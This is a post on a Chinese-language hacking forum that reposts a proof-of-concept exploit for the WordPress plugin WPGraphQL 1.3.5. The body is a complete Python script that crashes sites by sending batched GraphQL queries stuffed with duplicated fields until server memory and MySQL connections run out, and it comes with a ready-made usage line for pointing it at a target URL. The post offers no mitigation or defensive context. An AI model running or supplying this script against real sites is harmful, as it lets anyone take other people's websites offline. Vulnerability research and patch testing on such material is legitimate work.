跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

WordPress Plugin WPGraphQL 1.3.5 - Denial of Service


HACK1949

推荐的帖子

# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service 
# Author: Dolev Farhi
# Date: 2021-04-12
# Vendor Homepage: https://www.wpgraphql.com/
# Version: 1.3.5 
# Tested on: Ubuntu


"""
  This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.
"""

import sys
import requests


def usage():
  print('* WordPress GraphQL 1.3.5 Denial of Service *')
  print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0]))
  print('python {} http://site.com 10000 100'.format(sys.argv[0]))
  sys.exit(1)

if len(sys.argv) < 4:
  print('Missing arguments!')
  usage()

def wpgql_exists():
  try:
    r = requests.post(WORDPRESS_URL, json='x')
    if 'GraphQL' in r.json()['errors'][0]['message']:
      return True
  except:
    pass
  return False

# This PoC assumes graphql is located at index.php?graphql
WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'
FORCE_MULTIPLIER = int(sys.argv[2])
CHAINED_REQUESTS = int(sys.argv[3])

if wpgql_exists is False:
  print('Could not identify GraphQL running at "/index.php?graphql"')
  sys.exit(1)

queries = []

payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER
query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}

for _ in range(0, CHAINED_REQUESTS):
  queries.append(query)

r = requests.post(WORDPRESS_URL, json=queries)
print('Time took: {} seconds '.format(r.elapsed.total_seconds()))
print('Response:', r.json())
            
链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...